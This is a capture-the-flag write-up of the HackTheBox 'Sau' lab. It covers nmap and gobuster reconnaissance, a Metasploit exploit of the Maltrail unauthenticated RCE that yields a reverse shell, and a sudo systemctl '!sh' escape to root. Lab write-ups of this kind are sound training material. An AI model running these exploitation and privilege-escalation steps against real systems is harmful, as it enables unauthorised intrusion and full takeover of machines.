Inside the Box: Sau HackTheBox Uncovered
Embark on an exhilarating journey as we delve into the electrifying world of hacking, dissecting the “Sau” HackTheBox lab. With nerves of steel and a cunning eye for detail, we uncover hidden secrets within this mysterious domain. Armed with Nmap scans, we hunt for vulnerabilities, paving the path to exhilarating SSRF exploits and spine-tingling RCE attacks. Join me as I infiltrate, escalate, and ultimately conquer the challenge, unraveling the thrilling saga of penetration testing.
Information Gathering:
Initial Scanning:
sudo nmap -sV -sS -A <IP>
Nmap scan to identify open ports and services running on the target machine. The scan revealed the following information:
- Port 22 (SSH) is open, running OpenSSH 8.2p1 on an Ubuntu-based system.
- Port 80 (HTTP) is filtered and not responding.
- Port 55555 is open, but the service is unknown.
Directory Enumeration:
Gobuster to perform directory enumeration on the target’s web server, specifying common file extensions like .php
and .txt
gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 50
The results showed two directories:
/demo
/web
When I visited the /web
directory, I found "Request Baskets" web service running with version 1.2.1
In the /demo
directory, server is running Maltrail v0.53, a malicious traffic detection system.
Vulnerability Analysis:
I searched for known exploits related to “Request Baskets” and found a hit: “SSRF on Request-Baskets (CVE-2023–27163).”
Additionally, discovered an exploit for Maltrail: “Unauthenticated Remote Code Execution (RCE).”
Initial Foothold:
I decided to exploit the Maltrail service using Metasploit. Here are the steps:
- Launched
msfconsole
to open Metasploit. - Searched for the Maltrail exploit module using the command
search maltrail
. - Selected the appropriate exploit module (e.g.,
use 0
). - Checked the available options using
show options
.
- Set the target IP using
set RHOST <IP>
. - Set the target port to 55555 using
set RPORT 55555
. - Specified the target URI as
/demo
withset TARGETURI /demo
. - Set your listener IP (
LHOST
) and port (LPORT
) for the reverse shell.
- Finally, executed the exploit using
run
.
As a result, successfully obtained a Meterpreter session, gaining initial access to the target machine.
Privilege Escalation:
I executed sudo -l to check if there was any command that could be performed as sudo without a password.
I discovered that we could use sudo on systemctl, so I visited GTFObins and obtained the privilege escalation exploit to break out of the environment and gain root access.
# Execute
sudo /usr/bin/systemctl status trail.service
# Break environment
!sh
This action granted me root privileges, effectively taking control of the system.
Finally, you retrieved the user and root flags:
- The user flag is located at
/home/puma/user.txt
- The root flag is located at
/root/root.txt
Successfully compromised the Sau HackTheBox lab, obtained user and root privileges, and retrieved both user and root flags.